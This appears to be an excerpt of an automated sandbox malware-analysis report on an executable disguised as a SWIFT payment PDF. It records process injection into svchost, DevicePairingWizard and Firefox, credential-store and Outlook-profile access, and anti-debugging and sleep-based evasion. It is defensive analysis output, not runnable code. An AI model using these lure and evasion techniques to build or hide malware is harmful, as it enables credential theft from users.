                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeProcess created: C:\Windows\SysWOW64\DevicePairingWizard.exe "C:\Windows\SysWOW64\DevicePairingWizard.exe"
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe"Jump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeProcess created: C:\Windows\SysWOW64\DevicePairingWizard.exe "C:\Windows\SysWOW64\DevicePairingWizard.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nmlZZxePqIALDF.exe, 0000000B.00000000.1368079590.0000000000B3E000.00000002.00000001.01000000.00000007.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000000.1511410992.0000000000B3E000.00000002.00000001.01000000.00000007.sdmp
                Source: Binary string: wntdll.pdbUGP source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.906520048.0000000004560000.00000004.00001000.00020000.00000000.sdmp, Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.905073808.0000000004370000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1442164263.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1354730336.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1352046596.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1442164263.000000000332D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5054689691.000000000464D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1445676504.00000000041CF000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5054689691.0000000004520000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1448512086.0000000004378000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.906520048.0000000004560000.00000004.00001000.00020000.00000000.sdmp, Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.905073808.0000000004370000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1442164263.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1354730336.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1352046596.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1442164263.000000000332D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, DevicePairingWizard.exe, 0000000C.00000002.5054689691.000000000464D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1445676504.00000000041CF000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5054689691.0000000004520000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1448512086.0000000004378000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: DevicePairingWizard.pdb source: svchost.exe, 00000002.00000003.1410633669.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1410879115.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000003.4818771537.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000080C000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1733921214.000000002529C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000080C000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1733921214.000000002529C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: DevicePairingWizard.pdbGCTL source: svchost.exe, 00000002.00000003.1410633669.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1410879115.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000003.4818771537.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: real checksum: 0xa961f should be: 0xefad5
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0052D830 push 057A7DD9h; ret 2_2_0052D835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005388A9 push ds; iretd 2_2_005388B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0053AB5D push 21F2DB1Dh; retf 2_2_0053AB62
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0053837D push eax; ret 2_2_0053837E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0053AB23 push eax; iretd 2_2_0053AB4D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_005233A0 push eax; ret 2_2_005233A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00534C56 push cs; ret 2_2_00534C59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0052A563 push ebx; retn 8399h2_2_0052A6EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0053ED86 push ecx; retf 2_2_0053ED87
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00531F1D push esp; ret 2_2_00531F1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032021AD pushad ; retf 0004h2_2_0320223F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032097A1 push es; iretd 2_2_032097A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032308CD push ecx; mov dword ptr [esp], ecx2_2_032308D6
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02CFE6A4 push CF35D0C2h; retn 35D0h11_2_02CFE6A5
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02CFE6A4 push esp; iretd 11_2_02CFE6F7
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02CFE6A4 push eax; retf 9681h11_2_02CFE775
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D0FADD push ecx; retf 11_2_02D0FADE
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D090D4 push eax; ret 11_2_02D090D5
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D0B8B4 push 21F2DB1Dh; retf 11_2_02D0B8B9
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D0B87A push eax; iretd 11_2_02D0B8A4
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D059AD push cs; ret 11_2_02D059B0
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D09600 push ds; iretd 11_2_02D0960F
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02CF94AB push 00000045h; iretd 11_2_02CF94AE
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02D02C74 push esp; ret 11_2_02D02C75
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exeCode function: 11_2_02CFE587 push 057A7DD9h; ret 11_2_02CFE58C
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045221AD pushad ; retf 0004h12_2_0452223F
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045508CD push ecx; mov dword ptr [esp], ecx12_2_045508D6
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_045297A1 push es; iretd 12_2_045297A8
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0441745F pushad ; retf 12_2_04417467
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 12_2_0441554A push cs; retf 12_2_0441554B
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: \swift mt1o3 payment notification scan copy ref 62587299-24_pdf.exe
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: \swift mt1o3 payment notification scan copy ref 62587299-24_pdf.exeJump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeAPI/Special instruction interceptor: Address: 412327C
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeAPI/Special instruction interceptor: Address: 7FFDBFA2D144
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeAPI/Special instruction interceptor: Address: 7FFDBFA2D604
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeAPI/Special instruction interceptor: Address: 7FFDBFA2D764
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeAPI/Special instruction interceptor: Address: 7FFDBFA2D324
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeAPI/Special instruction interceptor: Address: 7FFDBFA2D364
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeAPI/Special instruction interceptor: Address: 7FFDBFA2D004
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeAPI/Special instruction interceptor: Address: 7FFDBFA2FF74
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeAPI/Special instruction interceptor: Address: 7FFDBFA2D864
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0052483C rdtsc 2_2_0052483C
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeWindow / User API: threadDelayed 9144Jump to behavior
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87638
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeAPI coverage: 3.8 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeAPI coverage: 1.7 %
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exe TID: 2884Thread sleep count: 121 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exe TID: 2884Thread sleep time: -242000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exe TID: 2884Thread sleep count: 9144 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exe TID: 2884Thread sleep time: -18288000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe TID: 7760Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe TID: 7760Thread sleep count: 45 > 30Jump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe TID: 7760Thread sleep time: -67500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe TID: 7760Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe TID: 7760Thread sleep time: -44000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_004788BD
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0044BD27 FindFirstFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0044BF8B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                Source: DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000080C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                Source: nmlZZxePqIALDF.exe, 0000000D.00000002.5957242228.000000000126F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                Source: firefox.exe, 0000000E.00000002.1735195265.0000022FA5286000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0052483C rdtsc 2_2_0052483C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00537AF3 LdrLoadDll,2_2_00537AF3
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_041234E8 mov eax, dword ptr fs:[00000030h]0_2_041234E8
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_04123548 mov eax, dword ptr fs:[00000030h]0_2_04123548
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_04121EB8 mov eax, dword ptr fs:[00000030h]0_2_04121EB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268322 mov eax, dword ptr fs:[00000030h]2_2_03268322
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268322 mov eax, dword ptr fs:[00000030h]2_2_03268322
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268322 mov eax, dword ptr fs:[00000030h]2_2_03268322
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03303336 mov eax, dword ptr fs:[00000030h]2_2_03303336
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325332D mov eax, dword ptr fs:[00000030h]2_2_0325332D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E328 mov eax, dword ptr fs:[00000030h]2_2_0322E328
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E328 mov eax, dword ptr fs:[00000030h]2_2_0322E328
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E328 mov eax, dword ptr fs:[00000030h]2_2_0322E328
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229303 mov eax, dword ptr fs:[00000030h]2_2_03229303
